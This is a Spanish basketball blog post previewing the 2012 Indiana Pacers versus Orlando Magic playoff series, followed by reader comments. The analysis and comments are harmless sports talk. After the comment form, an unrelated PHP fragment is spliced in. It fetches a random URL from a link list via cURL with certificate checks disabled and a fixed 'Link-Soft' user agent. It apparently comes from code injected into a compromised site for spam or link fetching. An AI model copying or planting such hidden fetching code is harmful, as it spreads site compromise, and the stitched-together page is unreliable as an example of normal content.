Análisis: Indiana Pacers(3) vs Orlando Magic(6)

28 de April de 2012 por Viva_Dirk

Regular: 1-2

Pacers: 97.7 PF – 94.4 PC

Magic: 94.2 PF – 93.4 PC

Nos gustaría decir que estamos ante una de las eliminatorias más igualadas y apasionantes de estos Playoffs. De hecho, habría sido cierto de llegar ambos equipos con todos sus efectivos, pero la baja de Dwight Howard es una losa demasiado grande para Orlando. Los Pacers han dado un paso adelante y cuentan con una plantilla extensa y equilibrada; Hibbert y George han evolucionado y aunque no ha sido un año brillante de David West, su adquisición ha sido todo un acierto y parece llegar en el mejor momento. Por su parte, los Magic han tenido un año irregular hasta decir basta. La incertidumbre del futuro de Howard y una plantilla con demasiados contratos que no se ajustan a su rendimiento los han dejado en una situación muy delicada. Su mejor hombre ha sido Ryan Anderson, al cual justo ahora tienen que renovar. Un ejemplo claro de la expresión “a perro flaco, todo son pulgas”.

Claves de la eliminatoria

– Juego interior: Sin Howard, los de Van Gundy cuentan con Davis y Anderson como únicos interiores de nivel, y Anderson vive mucho tiempo en la línea de 3. Por contra, los Pacers tienen una batería completísima, Hibbert, West y Hansbrough son muy compatibles, y si hay que tirar puramente de casta cuentan con Amundson. Esta batalla esta más que decidida y si el juego ofensivo de Indiana se centra más en Hibbert el destrozo puede ser total.

– Tiro de 3: No hablamos de que los exteriores anoten, sino puramente del tiro de 3. Los Magic consiguen casi un tercio de sus puntos desde los 7.25 y en un día inspirado de sus múltiples tiradores es un arma dificil de parar. Bien es verdad que muchos de esos tiros vienen provocados por los huecos que genera Howard, y ahora no los habrá.

– Duelo de bases: Pocas sorpresas vamos a llevarnos de Jameer Nelson. Desde que disputaran la final de 2009  su rendimiento no ha hecho otra cosa  que bajar y esto ha sido uno de los principales males de los Magic, teniendo en cuenta las expectativas. Tampoco ha cumplido con las suyas hasta la fecha Darren Collison, hasta el punto de perder la titularidad en favor de George Hill. Tras un gran año en New Orleans, cada vez más vemos en Collison el base correcto y ordenado de su etapa universitaria. Con el caudal ofensivo que tiene a su alrededor hay que pedirle una mejor dirección y un mayor acierto en el tiro, algo de lo que Hill se ha mostrado capaz.

– Experiencia: Aquí sí tienen un punto a favor los Magic. Jugadores como Nelson, Turkoglu, los Richardson, Davis, Redick y Anderson tienen una buena experiencia en Playoffs, algo de lo cual carecen la mayoría de los jugadores de Indiana. Esto puede influir a la hora de cerrar partidos o desplegar su juego habitual.

Pronóstico

4-1 Pacers

Calendario

Partido 1 – Domingo 29 de abril en Indianapolis (01h00)
Partido 2 – Martes 1 de mayo en Indianapolis (01h30)
Partido 3 – Viernes 4 de mayo en Orlando (01h30)
Partido 4 – Sábado 5 de mayo en Orlando (20h00)
Partido 5 – Miércoles 9 de mayo en Indianapolis
Partido 6 – Viernes 11 de mayo en Orlando
Partido 7 – Domingo 13 de mayo en Indianapolis

Comenta

9 comentarios a esta entrada

  1. Esteban dice:
    #1

    sin howard, los magic no solo no tienen un pivote, sino que ademas tienen que jugar su ofensiva y sobretodo su defensiva de forma diferente a como han jugado los ultimos 5 años

    aun son peligrosos, creo que redick dara un paso al frente y anotara como en su epoca universitaria, tiros sobran en este equipo,

    jugadores como richarson, glen davis y anderson no son de menospreciar, pero no tienen suficiente potencial ni banca para vencer a los pacers,

    la opcion seria que a los pacers les pese ser candidatos y se inhiban un poco, donde la experiencia de los HOMBRES del magic pueda sobreponerse

      Citar

  2. MagicJohnson32 dice:
    #2

    A ver si lo de los Pacers va en serio. Creo que nadie se acaba de creer su balance y su tercera plaza. Si van en serio deberían de ganar con contundencia, 4-1 como mucho.

      Citar

  3. Sancho88 dice:
    #3

    Acertadísimo análisis Dirk. Creo que efectivamente la experiencia de los Magic les permitirá no hacer el ridículo, pero nada más, y creo que Indiana se dejará ir un poco fuera de su cancha y ahí cazará algún partido Magic… habrá sexto partido en mi opinión. 4-2. Collison a mí me esta´decepcionando un puñao. Hill es con muchísimo mejor jugador que él en absolutamente todo.

      Citar

  4. Sancho88 dice:
    #4

    MagicJohnson32:
    A ver si lo de los Pacers va en serio. Creo que nadie se acaba de creer su balance y su tercera plaza. Si van en serio deberían de ganar con contundencia, 4-1 como mucho.

    Yo sí me creo su balance y su tercera plaza. Salvando las distancias, su temporada es similar a la de los Bulls, aunque un peldaño por debajo, obviamente. Concepto de equipo total, cuando se ponen en defensa son durillos y en ataque juegan muy sencillo, muy fácil, abriendo bien las alas y con Hill dirigiendo bastante bien el cotarro. Lo de George partiendo el centro de las zonas rivales es brutal, lo de Granger es un temporadón magnífico, aceptando que su rol de anotador compulsivo tenía que bajar algunos pistones, y sabiendo adaptarse a las circunstancias; cuando toca se la tira, cuando no no, y cuando toca decidir decide. Bueno, ahí tienen un bloque durísimo, más Barbosa sintiéndose a gusto desde el primer día. Y el juego interior está bastante bien, aunque le falta calidad como a los Bulls, y quizá algunos centímetros. West aporta la experiencia necesaria que les hace falta, Hansbrough no tiene mala mano para jugar como 4 abierto, aunque tiene más complicaciones en la zona, lo de Admundson es brutal, un tipo tan limitado aportando tanto, y he aquí mi duda. A ver, Roy Hibbert. Tiene muchas cosas buenas, pero siempre me deja esa sensación de tener mal tiro a canasta, mala cordinación, de que le pueden robar el balón en el poste en cualquier momento, de que saca faltas a veces inmerecidas que le regalan los árbitros cuando tira sus castañas y no hay contacto con su defensa… no sé, no sé, no sé…. a mí no me convence este tío. No obstante, sí, su balance es totalmente merecido y lo van a demostrar al menos en primera ronda

      Citar

  5. MagicJohnson32 dice:
    #5

    No, si a mí me encantan. Me gusta mucho George Hill desde su época en SAS (infinitamente más que Collison), me encanta la clase de David West, Paul George me parece un absoluto crack y Roy Hibbert es uno de los grandes pívots jóvenes de la liga, con una progresión sólida temporada a temporada. Creo que Granger se ha quedado a medias de lo que parecía pero tienes razón en que ha sabido adaptarse a su rol muy bien.

    Tengo ganas de que hagan un gran papel en Playoffs.

      Citar

  6. German dice:
    #6

    Yo veo muy desigual esta serie. Sin Howard creo que Orlando no tiene ninguna posiblidad. Diria que hay barrida pero espero que salven el honor con alguna victoria.
    El año que viene los Pacers tendran espacio salarial para dar algun golpe fuerte y si lo hacen… solo les falta pegar el salto de calidad porque equipo hay

      Citar

  7. Lucho dice:
    #7

    4-2 Pacers

      Citar

  8. Denise dice:
    #8

    Pues el primer asalto para los Magic a pesar del horrible partido de Anderson y Turkoglu. Zas en la boca para los del 4-0 y otro para los Nelson-haters. 17-9 para el bueno de Jameer, jugador mas infravalorado del blog.

    De todas formas, creo que Indiana pasará 4-2, lo cual realmente me da igual porque aunque Orlando pase no va a ganar el anillo,

    No coincido con el articulo. Creo que con Howard centrado (no el de el ultimo mes), los Magic habrían ganado facilmente a los Pacers.

      Citar

  9. Sancho88 dice:
    #9

    Denise, siempre te lo tomas como algo personal, así es imposible debatir contigo macho… es como si realmente la gente del blog tuviera algo contra ti o contra tus Magic. Tu crees que es asi?

    Bailecito de los pasos de Chris Duhon!! que crack!! descojonándose de Granger

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>